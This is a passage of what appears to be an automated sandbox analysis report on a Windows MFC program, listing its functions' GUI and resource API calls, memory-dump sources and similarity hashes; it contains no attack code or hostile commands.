Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2096#384#686ColorH_prologImageList_Masked
String ID:
API String ID: 1512221878-0
Opcode ID: 1394e6bc46925ba53dba922a39465b54f66c1c8a4f1d7ca86dff3472242dd8b6
Instruction ID: a6e8a59405af25c5b9806b834d579ac4f6b985fe472341beb62160fa5672521d
Opcode Fuzzy Hash: 1394e6bc46925ba53dba922a39465b54f66c1c8a4f1d7ca86dff3472242dd8b6
Instruction Fuzzy Hash: 5011EC71A00119FFCF119F91DD85EEEBB35FB44398F00013AB505621A0C7355E90DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00417D84, Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

#1146.MFC42(?,00000002), ref: 00417D90
FindResourceA.KERNEL32(00000000,?,00000002), ref: 00417DA1
FindResourceA.KERNEL32(00000000,?,00000002), ref: 00417DAF
LoadResource.KERNEL32(00000000,00000000), ref: 00417DB9
LockResource.KERNEL32(00000000), ref: 00417DC4
#1195.MFC42(00000000,00000000,00000000), ref: 00417DF7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Find$#1146#1195LoadLock
String ID:
API String ID: 2399665243-0
Opcode ID: 9757bc4709c69c9f0d4cff2d01abb7ac38f5599490346976fae7212b0006e36c
Instruction ID: 39b9ba2f4ed290555c88c871e9cd5df22471648b7e825a749ae9aeff56fc60a7
Opcode Fuzzy Hash: 9757bc4709c69c9f0d4cff2d01abb7ac38f5599490346976fae7212b0006e36c
Instruction Fuzzy Hash: 0101B13530821E6AD261272ABC09FF3297CEFC2791F450057B509D6292DE68CC81813C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F404, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000001), ref: 0041F433
ClientToScreen.USER32(?,00000001), ref: 0041F440
GetCursorPos.USER32(00000001), ref: 0041F44C
ClientToScreen.USER32(?,00000001), ref: 0041F459
#6215.MFC42(00000005), ref: 0041F46C
GetCursorPos.USER32(00000001), ref: 0041F47E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$ClientScreen$#6215
String ID:
API String ID: 3078493503-0
Opcode ID: 6b86c443fc533cb8e202fe1aecf4a3a63d6d5c95b2d03847363c397c5fae40ac
Instruction ID: 345d8d01bc5c354f4d9fae1e77cb4dc017b06733c560b6f4d4ee91dbcb49e9c3
Opcode Fuzzy Hash: 6b86c443fc533cb8e202fe1aecf4a3a63d6d5c95b2d03847363c397c5fae40ac
Instruction Fuzzy Hash: D511A135110918AFDF14EBA0DC48AEF7BB8FB54305F40013AE442D2160DB3C9E8ACB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401726, Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040AAE4
SendMessageA.USER32 ref: 0040AB18
#2915.MFC42(?), ref: 0040AB40
#5572.MFC42(000000FF,?), ref: 0040AB56
SendMessageA.USER32 ref: 0040AB6C
#800.MFC42 ref: 0040AB76

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#2915#5572#800H_prolog
String ID:
API String ID: 145943066-0
Opcode ID: d2a3b750eaf3cf991f61f7c0172748e9fcc0b645bb1d052b35d748222e45a20c
Instruction ID: bee963ea98858373e2e9a6ecbdb4f4bf9067296dac49b0c7338e024051788721
Opcode Fuzzy Hash: d2a3b750eaf3cf991f61f7c0172748e9fcc0b645bb1d052b35d748222e45a20c
Instruction Fuzzy Hash: 4F114F31A00218AFCF00DF94D985BDCBBB4EF08364F10826AF925AB2D0D7749A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC86, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CC8B
#540.MFC42 ref: 0040CC97
#4160.MFC42(00008052), ref: 0040CCA8

Part of subcall function 004011C2: #6199.MFC42(?,?), ref: 00421BDD

#4160.MFC42(00008073,00008052), ref: 0040CCC5

Part of subcall function 0040173F: _EH_prolog.MSVCRT ref: 00409EEE
Part of subcall function 0040173F: #540.MFC42 ref: 00409EFE
Part of subcall function 0040173F: #4160.MFC42(00008053), ref: 00409F20
Part of subcall function 0040173F: #2915.MFC42(?,00008053), ref: 00409F32
Part of subcall function 0040173F: #5572.MFC42(000000FF,?,00008053), ref: 00409F3F
Part of subcall function 0040173F: SendMessageA.USER32 ref: 00409F59
Part of subcall function 0040173F: #4160.MFC42(00008062), ref: 00409F63
Part of subcall function 0040173F: #2915.MFC42(?,00008062), ref: 00409F75
Part of subcall function 0040173F: #5572.MFC42(000000FF,?,00008062), ref: 00409F82
Part of subcall function 0040173F: SendMessageA.USER32 ref: 00409F91
Part of subcall function 0040173F: #4160.MFC42(00008054), ref: 00409F9B
Part of subcall function 0040173F: #2915.MFC42(?,00008054), ref: 00409FAD
Part of subcall function 0040173F: #5572.MFC42(000000FF,?,00008054), ref: 00409FBA
Part of subcall function 0040173F: SendMessageA.USER32 ref: 00409FC9
Part of subcall function 0040173F: InvalidateRect.USER32(?,00000000,00000001), ref: 00409FD2
Part of subcall function 0040173F: #800.MFC42 ref: 00409FDF

Part of subcall function 0040221B: _EH_prolog.MSVCRT ref: 00408CC6
Part of subcall function 0040221B: #540.MFC42 ref: 00408CD6
Part of subcall function 0040221B: #4160.MFC42(00008053), ref: 00408CF8
Part of subcall function 0040221B: #2915.MFC42(?,00008053), ref: 00408D0A
Part of subcall function 0040221B: #5572.MFC42(000000FF,?,00008053), ref: 00408D17
Part of subcall function 0040221B: SendMessageA.USER32 ref: 00408D31
Part of subcall function 0040221B: #4160.MFC42(00008062), ref: 00408D3B
Part of subcall function 0040221B: #2915.MFC42(?,00008062), ref: 00408D4D
Part of subcall function 0040221B: #5572.MFC42(000000FF,?,00008062), ref: 00408D5A
Part of subcall function 0040221B: SendMessageA.USER32 ref: 00408D69
Part of subcall function 0040221B: #4160.MFC42(00008054), ref: 00408D73
Part of subcall function 0040221B: #2915.MFC42(?,00008054), ref: 00408D85
Part of subcall function 0040221B: #5572.MFC42(000000FF,?,00008054), ref: 00408D92
Part of subcall function 0040221B: SendMessageA.USER32 ref: 00408DA1
Part of subcall function 0040221B: InvalidateRect.USER32(?,00000000,00000001), ref: 00408DAA
Part of subcall function 0040221B: #800.MFC42 ref: 00408DB7

Part of subcall function 00402018: _EH_prolog.MSVCRT ref: 0040AD96
Part of subcall function 00402018: #540.MFC42 ref: 0040ADA2
Part of subcall function 00402018: #4160.MFC42(00008050), ref: 0040ADB3
Part of subcall function 00402018: #6199.MFC42(?,00008050), ref: 0040ADBD
Part of subcall function 00402018: #800.MFC42(?,00008050), ref: 0040ADC9

Part of subcall function 004013D4: _EH_prolog.MSVCRT ref: 0040E57D
Part of subcall function 004013D4: #6199.MFC42(0044217C), ref: 0040E5AD
Part of subcall function 004013D4: #2642.MFC42(00000000,0044217C), ref: 0040E5BF
Part of subcall function 004013D4: #2642.MFC42(00000000,00000000,0044217C), ref: 0040E5C7
Part of subcall function 004013D4: #537.MFC42(00008077,00000000,00000000,0044217C), ref: 0040E5D4
Part of subcall function 004013D4: #6199.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5E2
Part of subcall function 004013D4: #800.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5EE

#4160.MFC42(0000E000,00008073,00008052), ref: 0040CD1A
#800.MFC42(?,0000E000,00008073,00008052), ref: 0040CD3F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4160$#2915#5572MessageSend$#800H_prolog$#540#6199$#2642InvalidateRect$#537
String ID:
API String ID: 3010634862-0
Opcode ID: ce5d06504eeb8314630ec424940ffd0f9a8426217150b1134457cafaa634518c
Instruction ID: 96c477ccd863e6a87f3890d063bae7edc01f2c1d9fc48415715bffe200ea8659
Opcode Fuzzy Hash: ce5d06504eeb8314630ec424940ffd0f9a8426217150b1134457cafaa634518c
Instruction Fuzzy Hash: EA116D30A10A149BC718FB71DC56AEEB3B5BF54308F80482EA067320E1DFB82A04CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0A1, Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D0A6
#535.MFC42(?), ref: 0040D0C1
#535.MFC42(?,?,?,?), ref: 0040D0D7
#2819.MFC42(?,00008067,?,?,?,?,?), ref: 0040D0EF

Part of subcall function 00401A8C: _EH_prolog.MSVCRT ref: 0040A3AD
Part of subcall function 00401A8C: #3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3D2
Part of subcall function 00401A8C: #2915.MFC42(?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3ED
Part of subcall function 00401A8C: #5572.MFC42(000000FF,?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 0040A3FA
Part of subcall function 00401A8C: SendMessageA.USER32 ref: 0040A433
Part of subcall function 00401A8C: #2915.MFC42(?), ref: 0040A44F
Part of subcall function 00401A8C: #5572.MFC42(000000FF,?), ref: 0040A45C
Part of subcall function 00401A8C: SendMessageA.USER32 ref: 0040A47D
Part of subcall function 00401A8C: #800.MFC42 ref: 0040A486
Part of subcall function 00401A8C: #800.MFC42 ref: 0040A491
Part of subcall function 00401A8C: #800.MFC42 ref: 0040A49D

#800.MFC42(?,?,?), ref: 0040D10A
#800.MFC42(?,?,?), ref: 0040D116

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2915#535#5572H_prologMessageSend$#2819#3998
String ID:
API String ID: 3552496044-0
Opcode ID: 6ea5d162e2b42d1c6c8cecfebafc68a547011b39fee3aa08d2ae0001be75c8f2
Instruction ID: 46f56b20b3a8a0202f9ae6a6874d8c96c2a3ed101d26dedd730dfe8b363ab5f3
Opcode Fuzzy Hash: 6ea5d162e2b42d1c6c8cecfebafc68a547011b39fee3aa08d2ae0001be75c8f2
Instruction Fuzzy Hash: 1601C070A10258BFCB04DF54D906BEE7BA8AB04318F00814EB452632C2DBB85B14CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004022C5, Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

#2302.MFC42(?,000003ED,?), ref: 0040BA9B
#2302.MFC42(?,000003E9,?,?,000003ED,?), ref: 0040BAAD
#2302.MFC42(?,000003EB,?,?,000003E9,?,?,000003ED,?), ref: 0040BABF
#2302.MFC42(?,000003EC,?,?,000003EB,?,?,000003E9,?,?,000003ED,?), ref: 0040BAD1
#2302.MFC42(?,000003EF,?,?,000003EC,?,?,000003EB,?,?,000003E9,?,?,000003ED,?), ref: 0040BAE3
#2302.MFC42(?,000003F1,?,?,000003EF,?,?,000003EC,?,?,000003EB,?,?,000003E9,?,?), ref: 0040BAF5

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2302
String ID:
API String ID: 735948377-0
Opcode ID: 64ef9fae020332b7ce41be1ad2f47ddca67fef480b3668693ff9022de10d2ed8
Instruction ID: e0fe6edfc1298a628144dcdce24d04e2068057daaf47d048b8f0836aed51fe24
Opcode Fuzzy Hash: 64ef9fae020332b7ce41be1ad2f47ddca67fef480b3668693ff9022de10d2ed8
Instruction Fuzzy Hash: A2F09635200110BBE312F651FCC2FFF67AC9B85B05F45082FBA94A50C5CFA8251163B5

Uniqueness

Uniqueness Score: -1.00%

Function 00401901, Relevance: 9.0, APIs: 6, Instructions: 34COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041F7B7
#540.MFC42 ref: 0041F7D0
#540.MFC42 ref: 0041F7DC
#540.MFC42 ref: 0041F7E8
#540.MFC42 ref: 0041F7F4
#540.MFC42 ref: 0041F800

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #540$H_prolog
String ID:
API String ID: 385474894-0
Opcode ID: 095d38347d4e95db1dc3ef2efe74826ba9c325510eb4d5c5da791ae70ed208ec
Instruction ID: bf29efd0beb1a9a04744708d8e60ce8fc6958d76a17a0bf14e6d94ff30f65c76
Opcode Fuzzy Hash: 095d38347d4e95db1dc3ef2efe74826ba9c325510eb4d5c5da791ae70ed208ec
Instruction Fuzzy Hash: 2001A771A04660DEC715EF55D10179DBBF4AF24318F50845FA49663782CBB85B08C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F736, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041F73B
#540.MFC42 ref: 0041F754
#540.MFC42 ref: 0041F760
#540.MFC42 ref: 0041F76C
#540.MFC42 ref: 0041F778
#540.MFC42 ref: 0041F784

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #540$H_prolog
String ID:
API String ID: 385474894-0
Opcode ID: 0cf93aec874a280c79cc018d1db967ef3cd6c2a71d845525415fa6d9d32c6bcb
Instruction ID: be9696e77a6136ef8a7d87fbacd05f1f46659780fa80c1dded3611ef1f4ea2f8
Opcode Fuzzy Hash: 0cf93aec874a280c79cc018d1db967ef3cd6c2a71d845525415fa6d9d32c6bcb
Instruction Fuzzy Hash: 6701A271A04B60CFD720DF55D11539AF7F4AF14318F41895ED09663A82DBB8AB08CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401CDF, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410A74
ClientToScreen.USER32(?,?), ref: 00410A96
#500.MFC42 ref: 00410BB1
#772.MFC42 ref: 00410C8D

Strings

4B, xrefs: 00410BBD, 00410BC2

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #500#772ClientH_prologScreen
String ID: 4B
API String ID: 1298778311-455405905
Opcode ID: 711d0b6f85cae836200a1575b356ede37d1a644a23b3b68df7fa44151320a8c0
Instruction ID: 607850565b8b3f76de665307613eb3011690e46a69a53dafec8e10de2ba68bd6
Opcode Fuzzy Hash: 711d0b6f85cae836200a1575b356ede37d1a644a23b3b68df7fa44151320a8c0
Instruction Fuzzy Hash: 11710B75A00609CFCB18CFA8C594AEEB7B2FF54304F20852AD556A7340D7B8ADC5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3ED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E3F2
#364.MFC42(00000066), ref: 0040E401
#567.MFC42(00000066), ref: 0040E412
#567.MFC42(00000066), ref: 0040E429

Strings

zdB, xrefs: 0040E431

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$#364H_prolog
String ID: zdB
API String ID: 284120412-1063565963
Opcode ID: 3864e093cc0676021a5be9eb85984084e39143b40d7220fff71db1c046398dd0
Instruction ID: e77148fc78e65977808dbeec608d98554094af6fc1e0bfa885b6128aa3a83444
Opcode Fuzzy Hash: 3864e093cc0676021a5be9eb85984084e39143b40d7220fff71db1c046398dd0
Instruction Fuzzy Hash: 3EF0E271B102608BC700AF44E5013AEB7A6EB80708F91841FE40167241DBF82A00C758

Uniqueness

Uniqueness Score: -1.00%

Function 00401357, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408C7B
#537.MFC42(CClientPrivateComView), ref: 00408C8C
#800.MFC42(CClientPrivateComView), ref: 00408CA8
#4508.MFC42(CClientPrivateComView), ref: 00408CAF

Strings

CClientPrivateComView, xrefs: 00408C84

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4508#537#800H_prolog
String ID: CClientPrivateComView
API String ID: 3708723662-357165002
Opcode ID: 9d75a8f4d665bed23f00885437d8dfae3c57794402d10273b2b60e2ed73f39b4
Instruction ID: 216a4fab9688a2d5bcc5296d325a5af4e87423b3f7e33872cd7bcb6e57350d68
Opcode Fuzzy Hash: 9d75a8f4d665bed23f00885437d8dfae3c57794402d10273b2b60e2ed73f39b4
Instruction Fuzzy Hash: C8E06571A155349BD708EB54E946AFD7374EF04324F50415FA022631D2DFB85E049A59

Uniqueness

Uniqueness Score: -1.00%

Function 00401E92, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00409EA3
#537.MFC42(CClientsComView), ref: 00409EB4
#800.MFC42(CClientsComView), ref: 00409ED0
#4508.MFC42(CClientsComView), ref: 00409ED7

Strings

CClientsComView, xrefs: 00409EAC

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
